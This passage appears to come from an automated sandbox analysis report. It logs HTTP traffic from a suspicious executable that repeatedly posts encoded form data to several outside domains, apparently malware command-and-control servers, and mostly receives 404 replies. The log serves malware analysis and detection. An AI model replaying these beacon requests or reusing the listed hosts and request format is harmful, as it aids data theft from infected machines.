                                                                                      Referer: http://www.accupower.tech/ojw7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 44 63 42 61 6c 34 64 5a 65 4c 69 68 64 7a 72 6b 6e 34 39 46 59 42 67 48 32 63 77 30 73 46 61 30 2b 4b 61 77 32 68 6e 50 34 50 41 46 6b 56 6a 4a 6e 4b 78 69 4c 46 61 48 53 6f 78 5a 53 49 5a 4a 4e 70 67 45 43 72 75 6e 75 45 32 49 71 65 79 31 46 4f 6d 76 6c 41 62 48 7a 34 5a 51 47 54 46 4a 56 59 6a 57 2b 35 6a 62 74 52 44 69 49 70 59 62 55 7a 71 50 37 44 46 34 52 6d 78 70 78 52 70 50 48 58 4d 6a 51 76 59 70 69 6e 50 72 50 66 2f 33 38 69 75 79 72 49 62 2b 49 59 49 79 58 38 46 5a 32 61 44 73 41 32 51 4c 6d 37 65 77 65 76 4c 59 67 68 4e 78 52 48 74 52 47 4b 42 79 52 35 5a 72 73 53 72 4d 76 75 72 75 6a 47 77 35 71 72 76 76 59 57 72 36 33 79 77 35 34 78 72 75 6c 43 64 6f 62 2f 74 57 78 39 42 68 63 6a 4d 4f 6f 73 6f 32 57 56 6d 38 6e 63 2f 47 57 6c 75 49 30 66 4f 6b 51 78 4a 73 71 65 61 70 47 4b 4c 41 61 70 45 74 64 2b 66 30 39 6f 78 46 56 74 77 65 56 72 4d 34 68 76 51 54 33 44 38 77 55 2b 4c 70 61 74 6b 75 64 2b 55 69 36 7a 35 41 4e 6a 35 77 70 79 71 72 46 77 4b 6a 58 65 6c 46 63 36 4c [TRUNCATED]
                                                                                      Sep 30, 2024 10:43:58.163693905 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Date: Mon, 30 Sep 2024 08:43:58 GMT
                                                                                      Server: Apache
                                                                                      Content-Encoding: gzip


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      28 | 192.168.2.6 | 58803 | 217.160.0.158 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Sep 30, 2024 10:44:00.047077894 CEST | 506 | OUT | GET /ojw7/?9jtPKX=Oep6mOdcbJS8M33gn6lJDCgdhZprpWT1xYap2DCm99RWzR/+rod5DkimcY1te6tRP4YAPOidnC7q9fyBbp+p4w7BxYlfBAVSQr378a/zqULvDaURYind12ZcUgt4zzVfKlFhbII=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.accupower.tech
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:44:00.690763950 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 33643
                                                                                      Connection: close
                                                                                      Date: Mon, 30 Sep 2024 08:44:00 GMT
                                                                                      Server: Apache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 58804 | 85.159.66.93 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:05.945419073 CEST | 778 | OUT | POST /ym4w/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.restobarbebek.xyz
                                                                                      Origin: http://www.restobarbebek.xyz
                                                                                      Referer: http://www.restobarbebek.xyz/ym4w/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 47 51 65 39 51 54 36 4d 37 2b 4e 74 67 43 31 32 45 6e 71 6c 4d 49 4c 6b 34 6f 2b 43 65 31 6f 7a 70 41 43 34 65 76 41 4b 37 69 67 45 48 74 33 32 64 30 42 4f 48 4c 76 36 33 53 36 73 4b 6f 6b 54 76 79 4e 35 59 35 7a 4a 41 38 4c 74 31 73 6e 34 4f 55 4e 4c 67 45 61 2f 65 69 33 33 74 74 67 45 6e 62 70 4d 4c 73 45 44 30 36 6b 32 4a 7a 48 79 49 75 4d 63 30 54 77 4a 34 66 33 66 63 75 67 35 30 2b 52 46 4c 4a 71 6a 6d 52 31 6d 39 6c 66 79 41 4a 55 73 59 6a 42 44 51 45 53 2f 79 37 38 45 2b 72 70 69 59 48 75 38 31 6d 36 4e 4d 6b 75 2f 30 54 4c 42 33 77 54 72 46 43 4d 44 30 50 5a 31 68 59 56 66 47 62 37 47 4f 62 38 39
                                                                                      Data Ascii: 9jtPKX=GQe9QT6M7+NtgC12EnqlMILk4o+Ce1ozpAC4evAK7igEHt32d0BOHLv63S6sKokTvyN5Y5zJA8Lt1sn4OUNLgEa/ei33ttgEnbpMLsED06k2JzHyIuMc0TwJ4f3fcug50+RFLJqjmR1m9lfyAJUsYjBDQES/y78E+rpiYHu81m6NMku/0TLB3wTrFCMD0PZ1hYVfGb7GOb89


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 58805 | 85.159.66.93 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:08.488476992 CEST | 802 | OUT | POST /ym4w/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.restobarbebek.xyz
                                                                                      Origin: http://www.restobarbebek.xyz
                                                                                      Referer: http://www.restobarbebek.xyz/ym4w/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 47 51 65 39 51 54 36 4d 37 2b 4e 74 69 69 6c 32 58 57 71 6c 62 34 4c 6e 30 49 2b 43 55 56 6f 76 70 41 4f 34 65 71 35 50 37 51 45 45 48 4a 7a 32 65 78 31 4f 45 4c 76 36 76 69 36 6a 45 49 6b 4d 76 79 41 4d 59 37 58 4a 41 38 66 74 31 73 58 34 4f 48 6c 49 76 30 61 68 53 43 33 78 7a 64 67 45 6e 62 70 4d 4c 73 52 57 30 36 38 32 4a 41 66 79 48 76 4d 66 33 54 77 4f 79 2f 33 66 59 75 67 31 30 2b 52 72 4c 4e 4c 72 6d 54 4e 6d 39 67 6a 79 44 61 4d 74 57 6a 42 4a 65 6b 54 63 7a 35 51 49 32 36 67 42 51 55 4b 59 6d 68 69 63 41 79 76 6c 6f 67 4c 69 6c 67 7a 70 46 41 55 78 30 76 5a 66 6a 59 74 66 55 4d 33 68 42 76 5a 65 51 45 4e 30 46 4e 35 55 45 42 4c 78 2b 4b 42 64 49 75 34 66 6f 77 3d 3d
                                                                                      Data Ascii: 9jtPKX=GQe9QT6M7+Ntiil2XWqlb4Ln0I+CUVovpAO4eq5P7QEEHJz2ex1OELv6vi6jEIkMvyAMY7XJA8ft1sX4OHlIv0ahSC3xzdgEnbpMLsRW0682JAfyHvMf3TwOy/3fYug10+RrLNLrmTNm9gjyDaMtWjBJekTcz5QI26gBQUKYmhicAyvlogLilgzpFAUx0vZfjYtfUM3hBvZeQEN0FN5UEBLx+KBdIu4fow==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 58807 | 85.159.66.93 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:11.036335945 CEST | 1815 | OUT | POST /ym4w/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.restobarbebek.xyz
                                                                                      Origin: http://www.restobarbebek.xyz
                                                                                      Referer: http://www.restobarbebek.xyz/ym4w/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 58808 | 85.159.66.93 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:13.657603979 CEST | 509 | OUT | GET /ym4w/?YDT4P=4xd8DzO&9jtPKX=LS2dTmeF3OBn8G1tQUmCXYTIgtzicGlzjT2aVYBBrxZqGpjDVT9zDZ74on3XL6wvhAoqbJrICZyPh8boIihM0FmnY1HfyNJnnrRiM85d/p0/MDPjGflqx28U0PmHY+963/VActc= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.restobarbebek.xyz
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Sep 30, 2024 10:44:14.326519012 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Mon, 30 Sep 2024 08:44:14 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      X-Rate-Limit-Limit: 5s
                                                                                      X-Rate-Limit-Remaining: 19
                                                                                      X-Rate-Limit-Reset: 2024-09-30T08:44:19.2137950Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 58809 | 221.128.225.57 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:20.568173885 CEST | 763 | OUT | POST /84h5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.cqghwamc.top
                                                                                      Origin: http://www.cqghwamc.top
                                                                                      Referer: http://www.cqghwamc.top/84h5/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 72 2f 63 4b 63 77 35 49 55 74 2f 41 61 31 6a 51 46 35 6e 78 63 6a 4d 59 66 68 53 38 51 72 56 37 50 36 77 62 36 7a 36 62 4f 37 39 6d 4c 75 64 54 36 6c 36 36 6f 41 74 6d 32 72 78 44 74 49 44 31 35 64 65 62 35 69 53 33 4d 6a 6b 32 2f 53 7a 51 50 32 74 45 57 33 34 53 38 44 2b 34 6c 53 4d 46 4f 74 69 36 4e 5a 69 65 69 4b 75 74 38 69 46 4a 52 6c 5a 47 64 57 6b 4f 31 74 52 54 39 46 4e 67 51 56 65 7a 58 42 4f 37 66 47 62 42 78 41 30 41 63 41 59 5a 47 34 56 6b 71 6a 6c 35 4a 4d 35 77 63 52 46 6a 46 71 4a 48 70 4f 6f 37 51 50 65 74 4c 36 73 66 44 4e 63 59 41 4a 55 39 34 30 34 75 61 55 39 49 6f 39 58 78 45 56 38 6e
                                                                                      Data Ascii: 9jtPKX=r/cKcw5IUt/Aa1jQF5nxcjMYfhS8QrV7P6wb6z6bO79mLudT6l66oAtm2rxDtID15deb5iS3Mjk2/SzQP2tEW34S8D+4lSMFOti6NZieiKut8iFJRlZGdWkO1tRT9FNgQVezXBO7fGbBxA0AcAYZG4Vkqjl5JM5wcRFjFqJHpOo7QPetL6sfDNcYAJU9404uaU9Io9XxEV8n
Sep 30, 2024 10:44:21.420587063 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      Set-Cookie: _d_id=b92b251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=Lax
                                                                                      Date: Mon, 30 Sep 2024 08:44:20 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 1163


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 58810 | 221.128.225.57 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:23.112644911 CEST | 787 | OUT | POST /84h5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.cqghwamc.top
                                                                                      Origin: http://www.cqghwamc.top
                                                                                      Referer: http://www.cqghwamc.top/84h5/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 72 2f 63 4b 63 77 35 49 55 74 2f 41 62 56 54 51 48 66 76 78 4a 7a 4d 58 47 68 53 38 48 37 55 38 50 36 4d 62 36 79 50 47 62 64 6c 6d 4c 50 74 54 37 68 4f 36 6b 67 74 6d 39 4c 78 38 70 49 44 75 35 64 43 6c 35 6e 71 33 4d 6a 67 32 2f 54 44 51 50 48 74 48 57 6e 34 71 32 54 2b 32 68 53 4d 46 4f 74 69 36 4e 5a 6e 31 69 4c 47 74 2f 54 31 4a 58 45 5a 48 55 32 6b 42 32 74 52 54 71 31 4e 6b 51 56 66 63 58 44 37 7a 66 46 6a 42 78 43 63 41 63 55 30 65 54 6f 56 69 31 7a 6b 46 41 70 51 65 59 52 45 51 62 4a 34 6b 70 4e 6f 52 63 5a 66 33 58 4a 73 38 52 64 38 61 41 4c 4d 50 34 55 34 45 59 55 46 49 36 71 62 57 4c 68 5a 45 6b 4c 30 4f 72 39 79 32 63 78 6c 79 37 42 41 4b 67 69 52 55 4a 51 3d 3d
                                                                                      Data Ascii: 9jtPKX=r/cKcw5IUt/AbVTQHfvxJzMXGhS8H7U8P6Mb6yPGbdlmLPtT7hO6kgtm9Lx8pIDu5dCl5nq3Mjg2/TDQPHtHWn4q2T+2hSMFOti6NZn1iLGt/T1JXEZHU2kB2tRTq1NkQVfcXD7zfFjBxCcAcU0eToVi1zkFApQeYREQbJ4kpNoRcZf3XJs8Rd8aALMP4U4EYUFI6qbWLhZEkL0Or9y2cxly7BAKgiRUJQ==
Sep 30, 2024 10:44:23.977242947 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      Set-Cookie: _d_id=b92a251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=Lax
                                                                                      Date: Mon, 30 Sep 2024 08:44:22 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 1163
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
Sep 30, 2024 10:44:23.977257967 CEST | 165 | IN
                                                                                      Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 58811 | 221.128.225.57 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:25.658911943 CEST | 1800 | OUT | POST /84h5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.cqghwamc.top
                                                                                      Origin: http://www.cqghwamc.top
                                                                                      Referer: http://www.cqghwamc.top/84h5/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Sep 30, 2024 10:44:26.510411024 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      Set-Cookie: _d_id=b92c251b6c5f2a61a1ec1a4d6cbeb7; Path=/; HttpOnly; SameSite=Lax
                                                                                      Date: Mon, 30 Sep 2024 08:44:24 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 1163
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
Sep 30, 2024 10:44:26.510438919 CEST | 165 | IN
                                                                                      Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 58812 | 221.128.225.57 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:28.203646898 CEST | 504 | OUT | GET /84h5/?9jtPKX=m90qfEx2Waj4M3qzKISaRwMNBxrGGJIjHL8e3ySRPK8oLcpI6mSZixZy+bRbuIjP1deJ2nKHD1dx+QvwZSZ/OQME4y6EqRE6EL+tH5CvtKetzx16bnZNcksA/ftcr1t/EGD4XGU=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.cqghwamc.top
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Sep 30, 2024 10:44:29.163096905 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      Set-Cookie: _d_id=b92e251b6c5f2a852b091a4d6cbeb7; Path=/; HttpOnly; SameSite=Lax
                                                                                      Date: Mon, 30 Sep 2024 08:44:26 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 1163
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
Sep 30, 2024 10:44:29.163227081 CEST | 165 | IN
                                                                                      Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 58813 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:34.212119102 CEST | 781 | OUT | POST /k9l7/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.yesonkoicasino.net
                                                                                      Origin: http://www.yesonkoicasino.net
                                                                                      Referer: http://www.yesonkoicasino.net/k9l7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=vWTRmcd8lIcSFr9ZRm+OGtCc62iYx7zNIN8JcXJ/4xk5SwGDYXmZLMzzmAbtmex+pnX+nGUlh9U18Er6+sBwmSkEit9mejnHYElGehBCZyNRCU1YIpvh59Kcx9SX7uHnqIXDBtYpaFi0do+Fm0DW1eMDEUEg/x5fUlN8OZ0ICpm3e1IwszgNRQJyTtwbGA4u5YyfZQ3YzcsB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 58814 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:36.799252987 CEST | 805 | OUT | POST /k9l7/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.yesonkoicasino.net
                                                                                      Origin: http://www.yesonkoicasino.net
                                                                                      Referer: http://www.yesonkoicasino.net/k9l7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=vWTRmcd8lIcSFLNZUGCOANCD1WiY6bzJIK0JcSxvtSA5c0KDZSKZMMzz+Qb0o+xlpnKenHYlh9A18Fb65fpznCkG2d9kQDnHYElGehVkZyFRBlFYP97i0dKT29SX/uHjqIXxBv8PaGa0douFlh/X8eMBbEFg+0cjaT4vA6QSa+yVbDJqwAguDApwTvopGg4E7YKfLH7/8oJiQqPEoyIdLlMI79+gWjt53w==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 58815 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:39.347944975 CEST | 1818 | OUT | POST /k9l7/ HTTP/1.1
